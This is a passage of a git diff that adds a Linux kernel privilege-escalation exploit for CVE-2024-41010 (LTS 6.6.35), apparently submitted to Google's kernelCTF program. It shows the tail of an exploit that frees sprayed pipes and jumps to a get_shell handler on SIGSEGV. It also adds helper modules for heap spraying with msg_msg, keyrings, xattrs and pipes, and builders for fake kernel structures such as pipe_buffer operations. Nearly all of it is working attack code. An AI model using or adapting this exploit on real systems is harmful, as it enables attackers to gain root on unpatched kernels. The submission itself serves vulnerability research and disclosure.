(longjump_victim_address&0xfff) + sizeof(longjump)); + + signal(SIGSEGV, get_shell); + + printf("[*] execute fake ops\n"); + + for(int i=0; i<0x1f8; i++) + release_pipe(pipes[i]); + + return 0; +} + + +int main(int argc, char *argv[]) +{ + while(run() < 0); +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/.gitignore b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/.gitignore new file mode 100644 index 00000000..15309787 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/.gitignore @@ -0,0 +1 @@ +*.o \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/Makefile b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/Makefile new file mode 100644 index 00000000..77966f2a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/Makefile @@ -0,0 +1,28 @@ +# https://github.com/qwerty-po/kernel_exploit_modules + +# define complier type +CC = gcc +# compile options setting +CFLAGS = -O2 -static +# library link & option setting + +msg_msg.o: msg_msg.c + $(CC) $(CFLAGS) -c $^ + +helper.o: helper.c + $(CC) $(CFLAGS) -c $^ + +xattr.o: xattr.c + $(CC) $(CFLAGS) -c $^ + +LDFLAGS = -lkeyutils +keyring.o: keyring.c + $(CC) $(CFLAGS) $(LDFLAGS) -c $^ + +pipe.o: pipe.c + $(CC) $(CFLAGS) -c $^ + +all: msg_msg.o helper.o xattr.o keyring.o pipe.o + +clean: + rm -f *.o \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.c new file mode 100644 index 00000000..8eb13ed1 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.c @@ -0,0 +1,126 @@ +// https://github.com/qwerty-po/kernel_exploit_modules/helper.c + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include 
+#include + +#include "helper.h" + +void panic(char *msg) +{ + perror(msg); + exit(-1); +} + +void print_hex_bytes(uint8_t *buf, int l, int r) +{ + for(int i = l; i < r; i+=0x10) + { + for(int j = 0; j < 0x10 && i + j < r; j++) + { + printf("%02x ", buf[i+j]); + } + printf("\n"); + } +} + +void print_hex_8bytes(uint64_t *buf, int l, int r) +{ + for(int i=l; ics), + [ss] "=r" (r->ss), + [rsp] "=r" (r->rsp), + [rflags] "=r" (r->rflags) + ); + + return r; +} + +uint64_t virt2page(uint64_t virt, uint64_t vmalloc_base, uint64_t vmemmap_base) { + assert((virt & 0xfff) == 0x000); + return (((virt - vmalloc_base) >> 0xc) << 0x6) + vmemmap_base; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.h b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.h new file mode 100644 index 00000000..8e554041 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.h @@ -0,0 +1,49 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include + +#ifndef MODULES_HELPER +#define MODULES_HELPER + +#define KMALLOC_16 (0x10) +#define KMALLOC_32 (0x20) +#define KMALLOC_64 (0x40) +#define KMALLOC_96 (0x60) +#define KMALLOC_128 (0x80) +#define KMALLOC_192 (0xc0) +#define KMALLOC_256 (0x100) +#define KMALLOC_512 (0x200) +#define KMALLOC_1K (0x400) +#define KMALLOC_2K (0x800) +#define KMALLOC_4K (0x1000) +#define KMALLOC_8K (0x2000) +#define KMALLOC_16K (0x4000) +#define KMALLOC_32K (0x8000) +#define KMALLOC_64K (0x10000) +#define KMALLOC_128K (0x20000) + +#define PAGE_SIZE KMALLOC_4K + +void print_hex_bytes(uint8_t *buf, int l, int r); +void print_hex_8bytes(uint64_t *buf, int l, int r); + +void cpu_affinity(int cpu); +void unshare_setup(int flags); + +void get_root(); + +void win(); +void get_shell(); + +struct regs { + uint64_t rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp, rip, rflags; + uint64_t cs, ss, ds, es, fs, gs; +}; +struct regs *save_state(); + +uint64_t 
virt2page(uint64_t virt, uint64_t vmalloc_base, uint64_t vmemmap_base); + +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.c new file mode 100644 index 00000000..7a2de4cd --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.c @@ -0,0 +1,61 @@ +// https://github.com/qwerty-po/kernel_exploit_modules/helper.c + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +#include + +#include "keyring.h" + +key_serial_t create_keyring(char *type, char *description, char *payload, uint64_t objectsz, key_serial_t ringid) +{ + key_serial_t keyring = add_key(type, description, payload, objectsz, ringid); + if(keyring < 0) + perror("add_key"); + return keyring; +} + +key_serial_t create_spec_keyring(char *type, char *description, char *payload, uint64_t objectsz) +{ + return create_keyring(type, description, payload, objectsz, KEY_SPEC_PROCESS_KEYRING); +} + +key_serial_t create_simple_keyring(char *payload, uint64_t objectsz) +{ + return create_spec_keyring(KEYRING_TYPE_USER, payload, payload, objectsz); +} + +struct keyring_ret *read_keyring(key_serial_t ringid, uint64_t sz) +{ + struct keyring_ret *ret = malloc(sizeof(struct keyring_ret)); + ret->size = keyctl_read_alloc(ringid, (void **)&ret->data); +} + +void update_keyring(key_serial_t ringid, char *payload, uint64_t objectsz) +{ + if(keyctl_update(ringid, payload, objectsz) < 0) + perror("keyctl_update"); +} + +void remove_keyring(key_serial_t ringid) +{ + if(keyctl_revoke(ringid) < 0) + perror("keyctl_revoke"); +} + +struct user_key_payload *fake_keyring(void *rcu_next, void *func, uint16_t datalen, char *data) +{ + struct user_key_payload *payload = malloc(USER_KEY_PAYLOAD_SIZE + datalen); + payload->rcu.next = rcu_next; + payload->rcu.func = func; + payload->datalen = datalen; + 
memcpy(payload->data, data, datalen); + + return payload; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.h b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.h new file mode 100644 index 00000000..28049117 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.h @@ -0,0 +1,64 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +#include +#include + +#ifndef MODULES_KEYRING +#define MODULES_KEYRING + +typedef int32_t key_serial_t; + +#ifndef MODULES_RCU_CALLBACK_HEAD +#define MODULES_RCU_CALLBACK_HEAD +struct callback_head { + struct callback_head *next; + void (*func)(struct callback_head *); +}; +#endif + +struct user_key_payload { + struct callback_head rcu; + short unsigned int datalen; + char data[]; +}; + +struct keyring_ret { + uint64_t size; + char *data; +}; + +#define KEYRING_TYPE_USER "user" +#define KEYRING_TYPE_KEYRING "keyring" +#define KEYRING_TYPE_LOGON "logon" +#define KEYRING_TYPE_BIGKEY "big_key" + +#define USER_KEY_PAYLOAD_SIZE (sizeof(struct user_key_payload)) +#define KEYRING_KMALLOC_32 (0x20 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_64 (0x40 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_128 (0x80 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_256 (0x100 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_512 (0x200 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_1k (0x400 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_2k (0x800 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_4k (0x1000 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_8k (0x2000 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_16k (0x4000 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_32k (0x8000 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_64k (0x10000 - USER_KEY_PAYLOAD_SIZE) + +key_serial_t create_keyring(char *type, char *description, char *payload, uint64_t objectsz, 
key_serial_t ringid); +key_serial_t create_spec_keyring(char *type, char *description, char *payload, uint64_t objectsz); +key_serial_t create_simple_keyring(char *payload, uint64_t objectsz); + +struct keyring_ret *read_keyring(key_serial_t ringid, uint64_t sz); +void update_keyring(key_serial_t ringid, char *payload, uint64_t objectsz); +void remove_keyring(key_serial_t ringid); + +struct user_key_payload *fake_keyring(void *rcu_next, void *func, uint16_t datalen, char *data); +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.c new file mode 100644 index 00000000..6d7e0a39 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.c @@ -0,0 +1,113 @@ +// https://github.com/qwerty-po/kernel_exploit_modules/keyring.c + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +#include +#include +#include + +#include "msg_msg.h" + +#define DEBUG 0 + +int alloc_msg_queue(void) +{ + int msqid = msgget(IPC_PRIVATE, IPC_CREAT | 0666); + if (msqid == -1) + perror("msgget"); + return msqid; +} + +void insert_msg_msg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext) +{ + assert(msgsz <= objectsz); + struct msg *msg = (struct msg *)calloc(MSG_HEADER_SIZE + objectsz, 1); + + msg->m_type = mtype; + // in kernel, data will fill at [0x30, msgsz-MSG_MSG_HEADER_SIZE) + memset(msg->m_text, '\xbf', objectsz); + memcpy(msg->m_text, mtext, msgsz); + + if (msgsnd(msqid, msg, objectsz, 0) < 0) + perror("msgsnd"); +} + +char *read_msg_msg(int msqid, int64_t mtype, uint64_t msgsz) +{ + struct msg *buf = (struct msg *)calloc(MSG_HEADER_SIZE + msgsz, 1); + uint64_t len = 0; + if ((len = msgrcv(msqid, buf, msgsz, mtype, 0)) < 0) + perror("msgrcv"); + char *target = (char *)calloc(len, 1); + memcpy(target, buf->m_text, len); + return target; +} + +void 
release_msg_msg(int msqid, int64_t mtype) +{ + read_msg_msg(msqid, mtype, MSG_MSG_KMALLOC_CG_4k); +} + +void insert_msg_msgseg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext) +{ + assert(msgsz <= objectsz); + struct msg *msg = (struct msg *)calloc(MSG_HEADER_SIZE + MSG_MSG_KMALLOC_CG_4k + objectsz, 1); + + msg->m_type = mtype; + // in kernel, data will fill at [0x30, 4k) -> kmalloc-4k + // [0x8, msgsz) -> target slab + memset(msg->m_text, '\xbf', MSG_MSG_KMALLOC_CG_4k + objectsz); + memcpy(msg->m_text + MSG_MSG_KMALLOC_CG_4k, mtext, msgsz); + + #if DEBUG + printf("insert_msg_msgseg: msgsz: 0x%lx\n", MSG_MSG_KMALLOC_CG_4k + objectsz); + #endif + + + if (msgsnd(msqid, msg, MSG_MSG_KMALLOC_CG_4k + objectsz, IPC_NOWAIT) < 0) + perror("msgsnd"); +} + +char *read_msg_msgseg(int msqid, int64_t mtype, uint64_t objectsz) +{ + struct msg *msg = (struct msg *)calloc(MSG_HEADER_SIZE + MSG_MSG_KMALLOC_CG_4k + objectsz, 1); + if (msgrcv(msqid, msg, MSG_MSG_KMALLOC_CG_4k + objectsz, mtype, IPC_NOWAIT) < 0) + perror("msgrcv"); + + char *target = (char *)calloc(objectsz, 1); + memcpy(target, msg->m_text + MSG_MSG_KMALLOC_CG_4k, objectsz); + return target; +} + +void release_msg_msgseg(int msqid, int64_t mtype) +{ + read_msg_msgseg(msqid, mtype, MSG_MSG_KMALLOC_CG_4k + MSG_MSGSEG_KMALLOC_CG_4k); +} + +struct msg_msg *fake_msg_msg(struct list_head *list_next, struct list_head *list_prev, int64_t mtype, int m_ts, void *next, char *mtext, uint64_t datalen) +{ + struct msg_msg *msg = (struct msg_msg *)calloc(MSG_MSG_HEADER_SIZE + datalen, 1); + msg->m_list.next = list_next; + msg->m_list.prev = list_prev; + msg->m_type = mtype; + msg->m_ts = m_ts; + msg->next = next; + memcpy(msg->m_text, mtext, datalen); + + return msg; +} + +struct msg_msgseg *fake_msg_msgseg(struct msg_msgseg *next, char *mtext, uint64_t datalen) +{ + struct msg_msgseg *msgseg = (struct msg_msgseg *)calloc(MSG_MSGSEG_HEADER_SIZE + datalen, 1); + msgseg->next = next; + memcpy(msgseg->m_text, 
mtext, datalen); + + return msgseg; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.h b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.h new file mode 100644 index 00000000..0f0c6e34 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.h @@ -0,0 +1,75 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include + +#include +#include + +#ifndef MODULES_LIST_HEAD +#define MODULES_LIST_HEAD +struct list_head { + struct list_head *next, *prev; +}; +#endif + +#ifndef MODULES_MSG_MSG +#define MODULES_MSG_MSG +struct msg_msg{ + struct list_head m_list; + int64_t m_type; + int m_ts; + struct msg_msgseg *next; + void *security; + char m_text[]; +}; + +struct msg_msgseg { + struct msg_msgseg *next; + char m_text[]; +}; + +struct msg { + int64_t m_type; + char m_text[]; +}; + +#define MSG_HEADER_SIZE sizeof(struct msg) +#define MSG_MSG_HEADER_SIZE sizeof(struct msg_msg) +#define MSG_MSGSEG_HEADER_SIZE sizeof(struct msg_msgseg) + +#define MSG_MSG_KMALLOC_CG_64 (0x40 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_128 (0x80 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_192 (0xc0 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_256 (0x100 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_512 (0x200 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_1k (0x400 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_2k (0x800 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_4k (0x1000 - MSG_MSG_HEADER_SIZE) + +#define MSG_MSGSEG_KMALLOC_CG_16 (0x10 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_32 (0x20 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_64 (0x40 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_128 (0x80 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_192 (0xc0 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_256 (0x100 - MSG_MSGSEG_HEADER_SIZE) +#define 
MSG_MSGSEG_KMALLOC_CG_512 (0x200 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_1k (0x400 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_2k (0x800 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_4k (0x1000 - MSG_MSGSEG_HEADER_SIZE) + +int alloc_msg_queue(void); + +void insert_msg_msg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext); +char *read_msg_msg(int msqid, int64_t mtype, uint64_t msgsz); +void release_msg_msg(int msqid, int64_t mtype); + +void insert_msg_msgseg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext); +char *read_msg_msgseg(int msqid, int64_t mtype, uint64_t msgsz); +void release_msg_msgseg(int msqid, int64_t mtype); + +struct msg_msg *fake_msg_msg(struct list_head *list_next, struct list_head *list_prev, int64_t mtype, int m_ts, void *next, char *mtext, uint64_t datalen); +struct msg_msgseg *fake_msg_msgseg(struct msg_msgseg *next, char *mtext, uint64_t datalen); +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.c new file mode 100644 index 00000000..9b4734a3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.c @@ -0,0 +1,108 @@ +// https://github.com/qwerty-po/kernel_exploit_modules/pipe.c + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +#include + +#include "pipe.h" +#include "helper.h" + +#define DEBUG 0 + +struct pipeio *create_pipeio(void) +{ + struct pipeio *pio = (struct pipeio *)calloc(sizeof(struct pipeio), 1); + if(pipe((int *)&pio->pipe) < 0) + perror("pipe alloc"); + + #if DEBUG + printf("pipe readfd: %d\n", pio->pipe.readfd); + printf("pipe writefd: %d\n", pio->pipe.writefd); + #endif + + pio->is_ops_activated = false; + + return pio; +} + +void activate_ops(struct pipeio *pipe) +{ + char buf[0x10]; + 
if(write(pipe->pipe.writefd, "A", 1) < 0) + perror("pipe write & activate ops"); + pipe->is_ops_activated = true; +} + +void resize_pipe(struct pipeio *pipe, uint64_t objectsz) +{ + #if DEBUG + printf("pipe writefd: %d\n", pipe->pipe.writefd); + #endif + + if(fcntl(pipe->pipe.writefd, F_SETPIPE_SZ, objectsz) < 0) + perror("pipe resize"); +} + +void read_pipe(struct pipeio *pipe, char *buf, uint64_t size) +{ + if(read(pipe->pipe.readfd, buf, size) < 0) + perror("pipe read"); +} + +void write_pipe(struct pipeio *pipe, char *buf, uint64_t size) +{ + if(write(pipe->pipe.writefd, buf, size) < 0) + perror("pipe write"); + else + pipe->is_ops_activated = true; +} + +void release_pipe(struct pipeio *pipe) +{ + if(!pipe) + return; + close(pipe->pipe.readfd); + close(pipe->pipe.writefd); + free(pipe); +} + +void trigger_ops_release(struct pipeio *pipe) +{ + if(!pipe->is_ops_activated) + printf("trigger_ops_release: ops not activated\n"); + else + { + close(pipe->pipe.readfd); + close(pipe->pipe.writefd); + } +} + +struct pipe_buffer *fake_pipe_buffer(struct page *page, uint32_t offset, uint32_t len, void *ops, uint32_t flags, unsigned long private_v) +{ + struct pipe_buffer *pb = (struct pipe_buffer *)calloc(sizeof(struct pipe_buffer), 1); + pb->page = page; + pb->offset = offset; + pb->len = len; + pb->ops = ops; + pb->flags = flags; + pb->private_v = private_v; + + return pb; +} + +struct pipe_buf_operations *fake_pipe_buf_ops(void *release) +{ + struct pipe_buf_operations *pbo = (struct pipe_buf_operations *)calloc(sizeof(struct pipe_buf_operations), 1); + pbo->release = release; + + return pbo; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.h b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.h new file mode 100644 index 00000000..b136ead5 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.h @@ -0,0 +1,91 @@ +#define _GNU_SOURCE +#include 
+#include +#include +#include +#include +#include +#include + +#include + +#ifndef MODULES_PIPE +#define MODULES_PIPE + +struct pipe_inode_info { + struct pipe_buffer *bufs; + unsigned long nrbufs, curbuf; +}; + +struct pipe_buffer; +struct pipe_buf_operations { + /* + * ->confirm() verifies that the data in the pipe buffer is there + * and that the contents are good. If the pages in the pipe belong + * to a file system, we may need to wait for IO completion in this + * hook. Returns 0 for good, or a negative error value in case of + * error. If not present all pages are considered good. + */ + int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *); + + /* + * When the contents of this pipe buffer has been completely + * consumed by a reader, ->release() is called. + */ + void (*release)(struct pipe_inode_info *, struct pipe_buffer *); + + /* + * Attempt to take ownership of the pipe buffer and its contents. + * ->try_steal() returns %true for success, in which case the contents + * of the pipe (the buf->page) is locked and now completely owned by the + * caller. The page may then be transferred to a different mapping, the + * most often used case is insertion into different file address space + * cache. + */ + bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *); + + /* + * Get a reference to the pipe buffer. 
+ */ + bool (*get)(struct pipe_inode_info *, struct pipe_buffer *); +}; + +struct pipe_buffer { + struct page *page; + unsigned int offset, len; + const struct pipe_buf_operations *ops; + unsigned int flags; + unsigned long private_v; +}; + +struct pipeio { + struct { + int readfd, writefd; + } pipe; + bool is_ops_activated; +}; + +#define PIPE_BUFFER_KMALLOC_CG_64 (PAGE_SIZE) +#define PIPE_BUFFER_KMALLOC_CG_192 (PAGE_SIZE * 4) +#define PIPE_BUFFER_KMALLOC_CG_512 (PAGE_SIZE * 8) +#define PIPE_BUFFER_KMALLOC_CG_1k (PAGE_SIZE * 16) +#define PIPE_BUFFER_KMALLOC_CG_2k (PAGE_SIZE * 32) +#define PIPE_BUFFER_KMALLOC_CG_4k (PAGE_SIZE * 64) +#define PIPE_BUFFER_KMALLOC_CG_8k (PAGE_SIZE * 128) +#define PIPE_BUFFER_KMALLOC_CG_16k (PAGE_SIZE * 256) +#define PIPE_BUFFER_KMALLOC_CG_32k (PAGE_SIZE * 512) +#define PIPE_BUFFER_KMALLOC_CG_64k (PAGE_SIZE * 1024) + +struct pipeio *create_pipeio(void); + +void activate_ops(struct pipeio *pipe); +void resize_pipe(struct pipeio *pipe, uint64_t objectsz); +void read_pipe(struct pipeio *pipe, char *buf, uint64_t size); +void write_pipe(struct pipeio *pipe, char *buf, uint64_t size); +void release_pipe(struct pipeio *pipe); + +void trigger_ops_release(struct pipeio *pipe); + +struct pipe_buffer *fake_pipe_buffer(struct page *page, uint32_t offset, uint32_t len, void *ops, uint32_t flags, unsigned long private_v); +struct pipe_buf_operations *fake_pipe_buf_ops(void *release); +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.c new file mode 100644 index 00000000..c32429cf --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.c @@ -0,0 +1,106 @@ +// https://github.com/qwerty-po/kernel_exploit_modules/xattr.c + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#include "xattr.h" 
+#include "helper.h" + +char *gen_xattr_name(char *prefix, char *name) +{ + assert(prefix[strlen(prefix) - 1] == '.'); + char *xattr_name = (char *)calloc(strlen(prefix) + strlen(name) + 1, 1); + strcpy(xattr_name, prefix); + strcat(xattr_name, name); + return xattr_name; +} + +char *gen_xattr_name_fixed_sz(char *prefix, char *name, size_t sz) +{ + assert(prefix[strlen(prefix) - 1] == '.'); + char *xattr_name = (char *)calloc(strlen(prefix) + strlen(name) + sz, 1); + strcpy(xattr_name, prefix); + strcat(xattr_name, name); + memset(xattr_name + strlen(xattr_name), 'A', sz - 1 - strlen(xattr_name)); + name[sz-1] = '\0'; + return xattr_name; +} + +int create_xattr(char *fname, char *name, char *value, uint64_t objectsz, bool panic_on_warn) +{ + int err = 0; + if((err = setxattr(fname, name, value, objectsz, 0)) < 0) + { + if(panic_on_warn) + panic("setxattr"); + else + perror("setxattr"); + } + + return err; +} + +struct xattr_return *read_xattr(char *fname, char *name) +{ + struct xattr_return *ret = (struct xattr_return *)calloc(sizeof(struct xattr_return), 1); + + ret->value = (char *)calloc(0x10000, 1); + if((ret->size = getxattr(fname, name, ret->value, 0x10000)) < 0) + perror("getxattr"); + return ret; +} + +int remove_xattr(char *fname, char *name, bool panic_on_warn) +{ + int err = 0; + if((err = removexattr(fname, name)) < 0) + { + if(panic_on_warn) + panic("removexattr"); + else + perror("removexattr"); + } + return err; +} + +void remove_xattr_noerror(char *fname, char *name) +{ + removexattr(fname, name); +} + +#if MODULES_CONFIG_IS_XATTR_RBTREE +struct simple_xattr *fake_xattr(bool color, struct rb_node *parent, struct rb_node *right, struct rb_node *left, char *name, size_t size, char *value, uint64_t valuesz) +{ + struct simple_xattr *xattr = (struct simple_xattr *)calloc(sizeof(struct simple_xattr) + valuesz, 1); + xattr->rb_node.__rb_parent_color = (uint64_t)parent | color; + xattr->rb_node.rb_right = right; + xattr->rb_node.rb_left = left; + 
xattr->name = name; + xattr->size = size; + memcpy(xattr->value, value, valuesz); + + return xattr; +} +#else +struct simple_xattr *fake_xattr(struct list_head *next, struct list_head *prev, char *name, size_t size, char *value, uint64_t valuesz) +{ + struct simple_xattr *xattr = (struct simple_xattr *)calloc(sizeof(struct simple_xattr) + valuesz, 1); + xattr->list.next = next; + xattr->list.prev = prev; + xattr->name = name; + xattr->size = size; + memcpy(xattr->value, value, valuesz); + + return xattr; +} +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.h b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.h new file mode 100644 index 00000000..573e6a6d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.h @@ -0,0 +1,93 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +#include + +#ifndef MODULES_SIMPLE_XATTR +#define MODULES_SIMPLE_XATTR + +#define MODULES_CONFIG_IS_XATTR_RBTREE 1 + +#if MODULES_CONFIG_IS_XATTR_RBTREE + +#ifndef MODULES_RB_NODE +#define MODULES_RB_NODE + +#define RB_RED 0 +#define RB_BLACK 1 + +struct rb_node { + uint64_t __rb_parent_color; + struct rb_node *rb_right; + struct rb_node *rb_left; +}; +#endif + +struct simple_xattr { + struct rb_node rb_node; + char * name; + size_t size; + char value[]; +}; + +#else +#ifndef MODULES_LIST_HEAD +#define MODULES_LIST_HEAD +struct list_head { + struct list_head *next, *prev; +}; +#endif + +struct simple_xattr { + struct list_head list; + char * name; + size_t size; + char value[]; +}; + +#endif + +struct xattr_return { + uint64_t size; + char *value; +}; + +#define XATTR_HEADER_SIZE sizeof(struct simple_xattr) +#define XATTR_VALUE_KMALLOC_CG_64 (0x40 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_128 (0x80 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_192 (0xc0 - XATTR_HEADER_SIZE) +#define 
XATTR_VALUE_KMALLOC_CG_256 (0x100 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_512 (0x200 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_1K (0x400 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_2K (0x800 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_4K (0x1000 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_8K (0x2000 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_16K (0x4000 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_32K (0x8000 - XATTR_HEADER_SIZE) + +#define XATTR_PREFIX_USER "user." +#define XATTR_PREFIX_SYSTEM "system." +#define XATTR_PREFIX_TRUSTED "trusted." +#define XATTR_PREFIX_SECURITY "security." + +char *gen_xattr_name(char *prefix, char *name); +char *gen_xattr_name_fixed_sz(char *prefix, char *name, size_t sz); + +int create_xattr(char *fname, char *name, char *value, uint64_t objectsz, bool panic_on_warn); +struct xattr_return *read_xattr(char *fname, char *name); +int remove_xattr(char *fname, char *name, bool panic_on_warn); +void remove_xattr_noerror(char *fname, char *name); + +#if MODULES_CONFIG_IS_XATTR_RBTREE +struct simple_xattr *fake_xattr(bool color, struct rb_node *parent, struct rb_node *right, struct rb_node *left, char *name, size_t size, char *value, uint64_t valuesz); +#else +struct simple_xattr *fake_xattr(struct list_head *next, struct list_head *prev, char *name, size_t size, char *value, uint64_t valuesz); +#endif + +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/metadata.json b/pocs/linux/kernelctf/CVE-2024-41010_lts/metadata.json new file mode 100644 index 00000000..8bc72008 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/metadata.json @@ -0,0 +1,34 @@ +{ + "$schema":"https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids":[ + "exp183" + ], + "vulnerability":{ + 
